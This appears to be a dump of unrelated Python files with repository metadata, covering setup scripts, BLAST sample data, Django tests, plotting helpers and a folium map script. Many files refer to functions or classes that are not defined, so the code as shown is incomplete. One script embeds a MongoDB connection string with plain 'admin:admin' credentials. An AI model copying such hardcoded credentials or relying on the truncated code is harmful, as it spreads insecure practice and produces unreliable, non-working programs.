7c0d4593b55079c9f02350a49f16e7cc7ca276e1 | 2,435 | py | Python | acd-annotator-python/acd_annotator_python/acd_annotator.py | Alvearie/acd-extension-framework | 04779a66dec3be9cd0f1899037eaba9c505d3edd | [
"Apache-2.0"
] | 2 | 2021-04-20T17:30:37.000Z | 2021-11-28T01:03:27.000Z | acd-annotator-python/acd_annotator_python/acd_annotator.py | Alvearie/acd-extension-framework | 04779a66dec3be9cd0f1899037eaba9c505d3edd | [
"Apache-2.0"
] | 2 | 2021-04-15T14:16:10.000Z | 2021-04-16T16:45:58.000Z | acd-annotator-python/acd_annotator_python/acd_annotator.py | Alvearie/acd-extension-framework | 04779a66dec3be9cd0f1899037eaba9c505d3edd | [
"Apache-2.0"
] | 4 | 2021-04-15T14:11:10.000Z | 2021-08-10T19:19:46.000Z | # ***************************************************************** #
# #
# (C) Copyright IBM Corp. 2021 #
# #
# SPDX-License-Identifier: Apache-2.0 #
# #
# ***************************************************************** #
from abc import ABC, abstractmethod
import inspect
from fastapi import Request
from acd_annotator_python.container_model.main import UnstructuredContainer
from acd_annotator_python.container_model.main import StructuredContainer
| 39.918033 | 120 | 0.561396 |
9fd0cbfeb51abe9f235403600ea433496b7820f2 | 14,396 | py | Python | objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py | Microsoft/CDM | 7ea59264d661356ca1b44c31a352753928d08b5f | [
"CC-BY-4.0",
"MIT"
] | 265 | 2018-03-04T04:47:50.000Z | 2019-05-06T13:31:18.000Z | objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py | Microsoft/CDM | 7ea59264d661356ca1b44c31a352753928d08b5f | [
"CC-BY-4.0",
"MIT"
] | 39 | 2018-03-21T16:57:12.000Z | 2019-05-06T17:30:23.000Z | objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py | Microsoft/CDM | 7ea59264d661356ca1b44c31a352753928d08b5f | [
"CC-BY-4.0",
"MIT"
] | 75 | 2018-03-09T20:33:13.000Z | 2019-05-05T06:55:43.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
import unittest
from cdm.utilities.logging import logger
from cdm.enums import CdmObjectType, CdmStatusLevel, CdmIncrementalPartitionType
from cdm.objectmodel import CdmCorpusContext, CdmCorpusDefinition, CdmManifestDefinition, CdmEntityDefinition
from cdm.persistence.cdmfolder import ManifestPersistence
from cdm.persistence.cdmfolder.types import ManifestContent
from cdm.utilities import Constants
from tests.cdm.cdm_collection.cdm_collection_helper_functions import create_document_for_entity
from tests.common import async_test, TestHelper
| 56.454902 | 221 | 0.727077 |
9fd1f014c5d5b7866e50185659805f63bd40ebd9 | 6,038 | py | Python | setup.py | andreatramacere/jetset | 4b7859622db9713b6ee243e2c12ec81321b372bf | [
"BSD-3-Clause"
] | 16 | 2019-02-11T06:58:43.000Z | 2021-12-28T13:00:35.000Z | setup.py | andreatramacere/jetset | 4b7859622db9713b6ee243e2c12ec81321b372bf | [
"BSD-3-Clause"
] | 14 | 2019-04-14T14:49:55.000Z | 2021-12-27T04:18:24.000Z | setup.py | andreatramacere/jetset | 4b7859622db9713b6ee243e2c12ec81321b372bf | [
"BSD-3-Clause"
] | 10 | 2019-02-25T14:53:28.000Z | 2022-03-02T08:49:19.000Z | #!/usr/bin/env python
from __future__ import division, absolute_import, print_function
__author__ = 'andrea tramacere'
from setuptools import setup, find_packages,Extension
# from setuptools.command.install import install
# from distutils.extension import Extension
# import distutils.command.install as orig
from distutils.command.build import build
from setuptools.command.install import install
from distutils.sysconfig import get_python_lib
import os
import glob
import shutil
import fnmatch
import json
import sys
# Map build/install/clean to the customised command implementations so the
# SWIG extension is generated before the Python package is built.
custom_cmdclass = {'build': CustomBuild,
                   'install': CustomInstall,
                   'clean': CustomClean}

# Read the package version from the bundled metadata file.
with open('jetset/pkg_info.json') as fp:
    _info = json.load(fp)

__version__ = _info['version']

# Collect runtime requirements, skipping comment lines.
# Fix: use a context manager instead of manual open/readlines/close, and
# the plainer `not ...` instead of `... is False`.
with open("./requirements.txt", 'r') as f:
    req = [n.strip() for n in f if not n.startswith('#')]

# C sources plus the SWIG interface for the jetkernel extension module.
src_files = ['jetset/jetkernel/jetkernel.i']
src_files.extend(glob.glob('jetkernel_src/src/*.c'))

_module = Extension('jetset.jetkernel/_jetkernel',
                    sources=src_files,
                    swig_opts=['-v', '-threads'],
                    include_dirs=['jetkernel_src/include'])

# Optionally run the Bessel-function build tests (used by CI builds).
if os.getenv('JETSETBESSELBUILD') == 'TRUE':
    _test_suite = 'jetset.tests.test_build_functions'
else:
    _test_suite = None

with open("proj_descr.md", "r") as f:
    long_description = f.read()

# When installing from a conda build, dependencies are handled by conda,
# so pip must not try to install the requirements itself.
is_conda = os.path.exists(os.path.join(sys.prefix, 'conda-meta'))

if is_conda:
    install_req = None
else:
    install_req = req

print('-> version', __version__, install_req)

setup(name='jetset',
      version=__version__,
      author='Andrea Tramacere',
      url='https://github.com/andreatramacere/jetset',
      long_description=long_description,
      long_description_content_type='text/markdown',
      description="A framework for self-consistent modeling and fitting of astrophysical relativistic jets SEDs",
      author_email='andrea.tramacere@gmail.com',
      packages=['jetset', 'jetset.leastsqbound', 'jetset.jetkernel', 'jetset.tests'],
      package_data={'jetset': ['Spectral_Templates_Repo/*.dat', 'test_data/SEDs_data/*ecsv', './requirements.txt', 'ebl_data/*', 'mathkernel/*dat'],
                    'jetkernel': ['mathkernel/*dat']},
      include_package_data=True,
      cmdclass=custom_cmdclass,
      ext_modules=[_module],
      install_requires=install_req,
      py_modules=['jetset.jetkernel/jetkernel'],
      python_requires='>=3.7',
      test_suite=_test_suite,
      zip_safe=True)
| 34.901734 | 176 | 0.48791 |
9fd494efb313bbd651da7b57c11d4c1658a52fc3 | 1,610 | py | Python | example/torch_classifier.py | KevinEloff/deep-chain-apps | 0952845e93f0c0592f04275fe99b122ff831901f | [
"Apache-1.1"
] | null | null | null | example/torch_classifier.py | KevinEloff/deep-chain-apps | 0952845e93f0c0592f04275fe99b122ff831901f | [
"Apache-1.1"
] | null | null | null | example/torch_classifier.py | KevinEloff/deep-chain-apps | 0952845e93f0c0592f04275fe99b122ff831901f | [
"Apache-1.1"
] | null | null | null | """
Module that provide a classifier template to train a model on embeddings.
With use the pathogen vs human dataset as an example. The embedding of 100k proteins come
from the protBert model.
The model is built with pytorch_ligthning, a wrapper on top of
pytorch (similar to keras with tensorflow)
Feel feel to build you own model if you want to build a more complex one
"""
from deepchain.dataset import load_pathogen_dataset
from deepchain.models import MLP
from deepchain.models.utils import (
confusion_matrix_plot,
dataloader_from_numpy,
model_evaluation_accuracy,
)
from sklearn.model_selection import train_test_split
# Load embedding and target dataset
X, y = load_pathogen_dataset()
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.3)
train_dataloader = dataloader_from_numpy(X_train, y_train, batch_size=32)
test_dataloader = dataloader_from_numpy(X_val, y_val, batch_size=32)
# Build a multi-layer-perceptron on top of embedding
# The fit method can handle all the arguments available in the
# 'trainer' class of pytorch lightening :
# https://pytorch-lightning.readthedocs.io/en/latest/common/trainer.html
# Example arguments:
# * specifies all GPUs regardless of its availability :
# Trainer(gpus=-1, auto_select_gpus=False, max_epochs=20)
mlp = MLP(input_shape=X_train.shape[1])
mlp.fit(train_dataloader, epochs=5)
mlp.save_model("model.pt")
# Model evaluation
prediction, truth = model_evaluation_accuracy(test_dataloader, mlp)
# Plot confusion matrix
confusion_matrix_plot(truth, (prediction > 0.5).astype(int), ["0", "1"])
| 36.590909 | 90 | 0.775776 |
9fd54ac2fec1187dcd8824c5cc8a001bad343192 | 5,589 | py | Python | towavfile.py | streamsoftdev/audiomods | 0e3d27fcd9af0a0f6a9de512112425e093f82dda | [
"Apache-2.0"
] | null | null | null | towavfile.py | streamsoftdev/audiomods | 0e3d27fcd9af0a0f6a9de512112425e093f82dda | [
"Apache-2.0"
] | null | null | null | towavfile.py | streamsoftdev/audiomods | 0e3d27fcd9af0a0f6a9de512112425e093f82dda | [
"Apache-2.0"
] | null | null | null | #Copyright 2022 Nathan Harwood
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import numpy as np
from pathlib import Path
import struct
from audiomodule.audiomodule import AM_CONTINUE, AM_CYCLIC_UNDERRUN, AM_ERROR, AM_INPUT_REQUIRED, MODULE_ERROR, \
AudioModule, sw_dtype, audiomod, nice_channels, nice_frequency_str, hms2_str
| 33.668675 | 113 | 0.580247 |
9fd5c810c4ce10644e6de28ce2355f1bd5e61c6a | 6,857 | py | Python | test/blast/sample_data.py | UdoGi/dark-matter | 3d49e89fa5e81f83144119f6216c5774176d203b | [
"MIT"
] | 10 | 2016-03-09T09:43:14.000Z | 2021-04-03T21:46:12.000Z | test/blast/sample_data.py | terrycojones/dark-matter | 67d16f870db6b4239e17e542bc6e3f072dc29c75 | [
"MIT"
] | 332 | 2015-01-07T12:37:30.000Z | 2022-01-20T15:48:11.000Z | test/blast/sample_data.py | terrycojones/dark-matter | 67d16f870db6b4239e17e542bc6e3f072dc29c75 | [
"MIT"
] | 4 | 2016-03-08T14:56:39.000Z | 2021-01-27T08:11:27.000Z | # Sample BLAST parameters.
PARAMS = {
'application': 'BLASTN',
'blast_cutoff': [
None,
None
],
'database': 'manx-shearwater',
'database_length': 17465129,
'database_letters': None,
'database_name': [],
'database_sequences': 70016,
'date': '',
'dropoff_1st_pass': [
None,
None
],
'effective_database_length': None,
'effective_hsp_length': 22,
'effective_query_length': None,
'effective_search_space': 382194648.0,
'effective_search_space_used': None,
'frameshift': [
None,
None
],
'gap_penalties': [
5,
2
],
'gap_trigger': [
None,
None
],
'gap_x_dropoff': [
None,
None
],
'gap_x_dropoff_final': [
None,
None
],
'gapped': 0,
'hsps_gapped': None,
'hsps_no_gap': None,
'hsps_prelim_gapped': None,
'hsps_prelim_gapped_attemped': None,
'ka_params': [
0.625,
0.41,
0.78
],
'ka_params_gap': [
None,
None,
None
],
'matrix': '',
'num_good_extends': None,
'num_hits': None,
'num_letters_in_database': 17465129,
'num_seqs_better_e': None,
'num_sequences': None,
'num_sequences_in_database': 70016,
'posted_date': [],
'query': 'GZG3DGY01ASHXW',
'query_id': 'Query_1',
'query_length': 46,
'query_letters': 46,
'reference': 'Stephen F. Altschul, Thomas L. Madden, ...',
'sc_match': 2,
'sc_mismatch': -3,
'threshold': None,
'version': '2.2.28+',
'window_size': None
}
RECORD0 = {
'query': 'id0',
'alignments': [
{
'length': 37000,
'hsps': [
{
'bits': 20,
'sbjct_end': 15400,
'expect': 1e-11,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 15362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Squirrelpox virus 1296/99',
},
{
'length': 38000,
'hsps': [
{
'bits': 25,
'sbjct_end': 12400,
'expect': 1e-10,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 12362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Squirrelpox virus 55',
}
]
}
RECORD1 = {
'query': 'id1',
'alignments': [
{
'length': 35000,
'hsps': [
{
'bits': 20,
'sbjct_end': 11400,
'expect': 1e-8,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 11362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Monkeypox virus 456',
},
{
'length': 35000,
'hsps': [
{
'bits': 20,
'sbjct_end': 10400,
'expect': 1e-7,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 10362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Mummypox virus 3000 B.C.',
}
]
}
RECORD2 = {
'query': 'id2',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 20,
'sbjct_end': 1400,
'expect': 1e-6,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
# Identical to RECORD2, apart from e-value.
RECORD3 = {
'query': 'id3',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 20,
'sbjct_end': 1400,
'expect': 1e-5,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
RECORD4 = {
'query': 'id4',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 10,
'sbjct_end': 1400,
'expect': 1e-3,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
},
{
'bits': 5,
'sbjct_end': 1400,
'expect': 1e-2,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
},
{
'bits': 3,
'sbjct_end': 1400,
'expect': 0.0,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
| 27.538153 | 70 | 0.392737 |
9fd7af8273e6b7e9744ade794d211dd5ee462f86 | 420 | py | Python | pyrigate/units/parse.py | pyrigate/pyrigate | 366e33ef46ebc7928cf35f2d51ed0855c59d1a68 | [
"MIT"
] | 1 | 2018-02-03T23:22:20.000Z | 2018-02-03T23:22:20.000Z | pyrigate/units/parse.py | pyrigate/pyrigate | 366e33ef46ebc7928cf35f2d51ed0855c59d1a68 | [
"MIT"
] | 1 | 2018-05-12T13:55:01.000Z | 2018-05-13T00:16:23.000Z | pyrigate/units/parse.py | pyrigate/pyrigate | 366e33ef46ebc7928cf35f2d51ed0855c59d1a68 | [
"MIT"
] | 1 | 2019-10-18T12:23:02.000Z | 2019-10-18T12:23:02.000Z | # -*- coding: utf-8 -*-
"""."""
import re
_UNIT_STRING_REGEX = r'^([0-9\.]+)(ml|cl|dl|l)$'
def parse_unit(unit_string):
"""."""
lower_unit_string = unit_string.lower()
match = re.match(_UNIT_STRING_REGEX, lower_unit_string)
if match:
try:
return float(match.group(1)), match.group(2)
except ValueError:
return None, None
else:
return None, None
| 18.26087 | 59 | 0.57381 |
9fd914093a9d2ec4b79940394bc875e521269c52 | 6,659 | py | Python | src/mhealth/data_analysis_tests/cross_correlator_test.py | hirsch-lab/mhealth | ad4287483cee206c7b8ff6216293f19d71296129 | [
"MIT"
] | 2 | 2021-01-05T10:53:57.000Z | 2021-02-26T09:15:14.000Z | src/mhealth/data_analysis_tests/cross_correlator_test.py | hirsch-lab/mhealth | ad4287483cee206c7b8ff6216293f19d71296129 | [
"MIT"
] | 3 | 2020-12-15T11:29:25.000Z | 2021-05-07T09:18:43.000Z | src/mhealth/data_analysis_tests/cross_correlator_test.py | hirsch-lab/mhealth | ad4287483cee206c7b8ff6216293f19d71296129 | [
"MIT"
] | null | null | null | import os
import glob
import unittest
from ..utils import testing
from ..utils import everion_keys
from ..utils.file_helper import FileHelper
from ..utils.data_aggregator import Normalization
from ..visualization.vis_properties import VisProperties
from ..data_analysis.cross_correlator import CrossCorrelator
_MHEALTH_DATA = os.getenv('MHEALTH_DATA', '../../resources')
_MHEALTH_OUT_DIR = os.path.join(_MHEALTH_DATA, 'output')
if __name__ == '__main__':
unittest.main()
| 44.691275 | 78 | 0.565851 |
9fd91ec0b1f55cd338e90af15b11bcbae0dc4915 | 1,471 | py | Python | neurgoo/misc/plot_utils.py | NISH1001/neurgoo | 83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74 | [
"MIT"
] | 2 | 2022-03-02T11:59:19.000Z | 2022-03-18T17:59:28.000Z | neurgoo/misc/plot_utils.py | NISH1001/neurgoo | 83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74 | [
"MIT"
] | 1 | 2022-03-03T14:07:19.000Z | 2022-03-03T14:07:19.000Z | neurgoo/misc/plot_utils.py | NISH1001/neurgoo | 83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from typing import Dict, List
try:
import matplotlib.pyplot as plt
MATPLOTLIB = True
except:
MATPLOTLIB = False
from loguru import logger
from .eval import EvalData
def plot_history(
    history: Dict[str, List[EvalData]], plot_type="loss", figure_size=(20, 7)
) -> None:
    """
    Plot train/val metrics on a single figure.

    Only epochs present in both the train and val histories are plotted.
    """
    if not MATPLOTLIB:
        logger.error("Maplotlib not installed. Halting the plot process!")
        return

    train = history.get("train", [])
    val = history.get("val", [])

    # restrict both series to the epochs they have in common
    shared_epochs = {e.epoch for e in train} & {e.epoch for e in val}
    train = sorted((e for e in train if e.epoch in shared_epochs), key=lambda e: e.epoch)
    val = sorted((e for e in val if e.epoch in shared_epochs), key=lambda e: e.epoch)

    plt.figure(figsize=figure_size)
    plt.plot([getattr(point, plot_type) for point in train])
    plt.plot([getattr(point, plot_type) for point in val])
    plt.legend([f"Train {plot_type}", f"Val {plot_type}"])
    plt.xlabel("epoch")
    plt.ylabel(f"{plot_type}")
if __name__ == "__main__":
    # NOTE(review): main() is not defined anywhere in this module, so
    # running the file as a script raises NameError — confirm intent.
    main()
| 23.349206 | 77 | 0.650578 |
9fdabb9fe3ddfe1efb0455a952de16d9ff31f05a | 3,277 | py | Python | LPSelectiveSearch.py | ksdsouza/license-plate-detector | 900a032768d9c623b7ecb1ec7abd07651fda2b16 | [
"MIT"
] | null | null | null | LPSelectiveSearch.py | ksdsouza/license-plate-detector | 900a032768d9c623b7ecb1ec7abd07651fda2b16 | [
"MIT"
] | null | null | null | LPSelectiveSearch.py | ksdsouza/license-plate-detector | 900a032768d9c623b7ecb1ec7abd07651fda2b16 | [
"MIT"
] | null | null | null | import itertools
import os
import sys
import cv2
import numpy as np
from SelectiveSearch import SelectiveSearch
images_path = "Images"
annotations = "Annotations"
cv2.setUseOptimized(True)
selective_search = SelectiveSearch()
train_images = []
train_labels = []
SS_IMG_SIZE = (224, 224)
# chunk = int(sys.argv[1])
# filenames = list(enumerate(
# f for f in os.listdir(annotations)
# if f.startswith('wts')
# ))[chunk * 20:(chunk + 1) * 20]
#
# for index, file in filenames:
# try:
# print(f"{index}\t{file}")
# boundary_box, img_filename = get_annotation(os.path.join(annotations, file))
# ss_results, img_out = selective_search.process_image(img_filename)
# lp_counter = 0
# bg_counter = 0
# fflag = False
# bflag = False
#
# for result in itertools.islice(ss_results, 2000):
# x1, y1, dx, dy = result
# if file.startswith('wts_textonly'):
# iou = 0
# else:
# iou = get_iou(boundary_box, {
# 'x1': x1,
# 'y1': y1,
# 'x2': x1 + dx,
# 'y2': y1 + dy
# })
# if bg_counter < 30:
# if iou < 0.3:
# test_image = img_out[y1: y1 + dy, x1:x1 + dx]
# resized = cv2.resize(test_image, SS_IMG_SIZE, interpolation=cv2.INTER_AREA)
# train_images.append(resized)
# train_labels.append(0)
# bg_counter += 1
# else:
# bflag = True
# if lp_counter < 30:
# if iou > 0.85:
# test_image = img_out[y1: y1 + dy, x1:x1 + dx]
# resized = cv2.resize(test_image, SS_IMG_SIZE, interpolation=cv2.INTER_AREA)
# train_images.append(resized)
# train_labels.append(1)
# lp_counter += 1
# else:
# fflag = True
# if fflag and bflag:
# break
# except Exception as e:
# print(e)
# print(f"Error occurred in {file}")
#
# np.save(f'train_images_chunk{chunk}', train_images)
# np.save(f'train_labels_chunk{chunk}', train_labels)
| 30.06422 | 97 | 0.523039 |
9fdadafb759d17ded7ccd299bdbfcf9faeff04b7 | 66 | py | Python | lang/py/cookbook/v2/source/cb2_1_18_exm_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/cookbook/v2/source/cb2_1_18_exm_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/cookbook/v2/source/cb2_1_18_exm_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | rx = re.compile(r'\b%s\b' % r'\b|\b'.join(map(re.escape, adict)))
| 33 | 65 | 0.575758 |
9fddbda4c3c7b498a0499af95d1e10c2e4bd8c81 | 233 | py | Python | projects/admin.py | kylef-archive/django-projects | 306043b7aea7a170adc70cb78844e039efc161d4 | [
"BSD-2-Clause"
] | 2 | 2015-02-15T19:01:29.000Z | 2015-11-08T13:25:14.000Z | projects/admin.py | kylef/django-projects | 306043b7aea7a170adc70cb78844e039efc161d4 | [
"BSD-2-Clause"
] | null | null | null | projects/admin.py | kylef/django-projects | 306043b7aea7a170adc70cb78844e039efc161d4 | [
"BSD-2-Clause"
] | 1 | 2021-08-02T19:08:29.000Z | 2021-08-02T19:08:29.000Z | from django.contrib import admin
from projects.models import Project
admin.site.register(Project, ProjectAdmin) | 29.125 | 45 | 0.751073 |
9fde09067036bce742f20360db8b7e67c431adac | 3,636 | py | Python | core/tests/test_office.py | cjmash/art-backend | fb1dfd69cca9cda1d8714bd7066c3920d1a97312 | [
"MIT"
] | null | null | null | core/tests/test_office.py | cjmash/art-backend | fb1dfd69cca9cda1d8714bd7066c3920d1a97312 | [
"MIT"
] | null | null | null | core/tests/test_office.py | cjmash/art-backend | fb1dfd69cca9cda1d8714bd7066c3920d1a97312 | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from django.db import transaction
from rest_framework.exceptions import ValidationError
from ..models import OfficeBlock, OfficeFloor, OfficeFloorSection
from core.tests import CoreBaseTestCase
User = get_user_model()
| 37.484536 | 73 | 0.668592 |
9fdf686d8f768389a99935e8b0188491d6cb098b | 2,481 | py | Python | tests/functional/collection/test_collection_show.py | sirosen/temp-cli-test | 416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6 | [
"Apache-2.0"
] | 47 | 2016-04-21T19:51:17.000Z | 2022-02-25T14:13:30.000Z | tests/functional/collection/test_collection_show.py | sirosen/temp-cli-test | 416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6 | [
"Apache-2.0"
] | 421 | 2016-04-20T18:45:24.000Z | 2022-03-14T14:50:41.000Z | tests/functional/collection/test_collection_show.py | sirosen/temp-cli-test | 416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6 | [
"Apache-2.0"
] | 20 | 2016-09-10T20:25:27.000Z | 2021-10-06T16:02:47.000Z | import pytest
| 36.485294 | 132 | 0.639258 |
9fdfc62d17a4273e27c2f11b9b40558a4ec8fe41 | 2,044 | py | Python | job.py | mapledyne/ihunttools | 28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8 | [
"MIT"
] | null | null | null | job.py | mapledyne/ihunttools | 28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8 | [
"MIT"
] | 2 | 2021-09-08T02:16:00.000Z | 2022-01-13T02:57:26.000Z | job.py | mapledyne/ihunttools | 28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8 | [
"MIT"
] | null | null | null | import argparse
import random
import ihuntapp
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Build an #iHunt job app page.')
parser.add_argument('--name', "-n",
default="Unnamed job", help='Name of the job')
parser.add_argument('--description', "-d",
default="No description available", help='Description of the job')
parser.add_argument('--image', "-i",
type=str, default="", help='Job image', required=True)
parser.add_argument('--price', "-p",
default=(random.randint(1, 18) * 500), help='Price the job pays')
parser.add_argument('--stars', "-s",
type=float, default=(random.randint(3, 8) * 0.5), help='Star level of job')
parser.add_argument('--currency', default="$", help='Currency symbol')
parser.add_argument('--distance',
type=float, default=random.uniform(5, 25), help='Distance of job')
parser.add_argument('--distanceunit', default="miles", help='distance unit')
parser.add_argument('--time', "-t",
type=float, default=random.randint(1, 3), help='Time of post')
parser.add_argument('--timeunit', default="days", help='Time unit')
parser.add_argument('--remaining', "-r",
type=float, default=random.randint(3, 8), help='Time of post')
parser.add_argument('--remainingunit', default="days", help='Time unit')
parser.add_argument('--output', '-o', default='job.png', help='Filename to save screenshot')
args = parser.parse_args()
phone = ihuntapp.iHuntApp(args.name, args.description, args.image)
phone.price = args.price
phone.stars = args.stars
phone.currency = args.currency
phone.distance = args.distance
phone.distanceunit = args.distanceunit
phone.time = args.time
phone.timeunit = args.timeunit
phone.remaining = args.remaining
phone.remainingunit = args.remainingunit
phone.screenshot(args.output)
| 44.434783 | 99 | 0.626223 |
9fe154537630b5423fecebdaa0e5bc8b96aff771 | 4,945 | py | Python | category_import.py | iankigen/art-backend | e46f8e1a530ae56b6a236af4ff686ca4e0dd6630 | [
"MIT"
] | null | null | null | category_import.py | iankigen/art-backend | e46f8e1a530ae56b6a236af4ff686ca4e0dd6630 | [
"MIT"
] | null | null | null | category_import.py | iankigen/art-backend | e46f8e1a530ae56b6a236af4ff686ca4e0dd6630 | [
"MIT"
] | null | null | null | import sys
import os
import csv
from tqdm import tqdm
import django
from import_util import display_inserted, display_skipped
project_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(project_dir)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
django.setup()
from core.models.asset import AssetCategory, AssetSubCategory # noqa
if __name__ == '__main__':
print('********* Import the csv file ********')
input_file = input('Import the file: ')
load_csv_file(input_file) # noqa
| 44.151786 | 79 | 0.394944 |
9fe1fc1239cc234d72923d2663fd719390f1395d | 454 | py | Python | epochbot/utils.py | jaloo555/solana-easy-py | 8e28b8de52fbe4ee0b8e94a0f9c728114fc91728 | [
"MIT"
] | 4 | 2021-09-10T19:20:42.000Z | 2022-02-12T00:27:40.000Z | epochbot/utils.py | jaloo555/solana-easy-py | 8e28b8de52fbe4ee0b8e94a0f9c728114fc91728 | [
"MIT"
] | null | null | null | epochbot/utils.py | jaloo555/solana-easy-py | 8e28b8de52fbe4ee0b8e94a0f9c728114fc91728 | [
"MIT"
] | 1 | 2021-11-08T15:32:46.000Z | 2021-11-08T15:32:46.000Z |
ENDPOINT_URLS_ENUM = enum(
MAIN='https://api.mainnet-beta.solana.com',
DEV='https://api.devnet.solana.com',
TEST='https://api.testnet.solana.com',
)
ENDPOINT_URLS = {
"MAIN":'https://api.mainnet-beta.solana.com',
"DEV":'https://api.devnet.solana.com',
"TEST":'https://api.testnet.solana.com',
} | 30.266667 | 66 | 0.645374 |
9fe207c6dcc8198ff87d2e16175a87d21e6112ea | 812 | py | Python | FrontEnd/mapa_pontos.py | JessicaIsri/WebBot | e9ed911c0306f5e362b577e244e50073336480ea | [
"bzip2-1.0.6"
] | null | null | null | FrontEnd/mapa_pontos.py | JessicaIsri/WebBot | e9ed911c0306f5e362b577e244e50073336480ea | [
"bzip2-1.0.6"
] | 1 | 2021-11-13T10:12:49.000Z | 2021-11-16T12:17:01.000Z | FrontEnd/mapa_pontos.py | JessicaIsri/WebBot | e9ed911c0306f5e362b577e244e50073336480ea | [
"bzip2-1.0.6"
] | null | null | null | import pymongo
import folium
from pymongo import MongoClient
db = MongoClient('mongodb+srv://admin:admin@cluster0-vuh1j.azure.mongodb.net/test?retryWrites=true&w=majority')
db = db.get_database('BD_EMPRESAS')
collection = db.empresas
cnpj = []
latitude = []
longitude = []
qtd_range = []
endereco = []
cnpj = db.get_collection('empresas').distinct("cnpj")
latitude = db.get_collection('empresas').distinct("latitude")
qtd_range = len(latitude)
longitude = db.get_collection('empresas').distinct("longitude")
endereco = db.get_collection('empresas').distinct("endereco")
mapa = folium.Map(location=[-23.4795233,-46.2698754],zoom_start=9)
for i in range(qtd_range):
folium.Marker([latitude[i], longitude[i]], popup='CNPJ: '+cnpj[i]+'\n Endereco: '+endereco[i]).add_to(mapa)
mapa.save("index.html") | 24.606061 | 111 | 0.730296 |
9fe282030a02b4055f9395a841b3fabbcbf1b05f | 835 | py | Python | tests/test_BG_IO.py | GeorgRamer/anasys-python-tools | f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa | [
"MIT"
] | null | null | null | tests/test_BG_IO.py | GeorgRamer/anasys-python-tools | f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa | [
"MIT"
] | null | null | null | tests/test_BG_IO.py | GeorgRamer/anasys-python-tools | f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa | [
"MIT"
] | null | null | null |
import anasyspythontools as apt
import pytest
import glob
import os
TESTFOLDER = os.path.join(os.path.dirname(__file__),"test data")
| 23.194444 | 83 | 0.646707 |
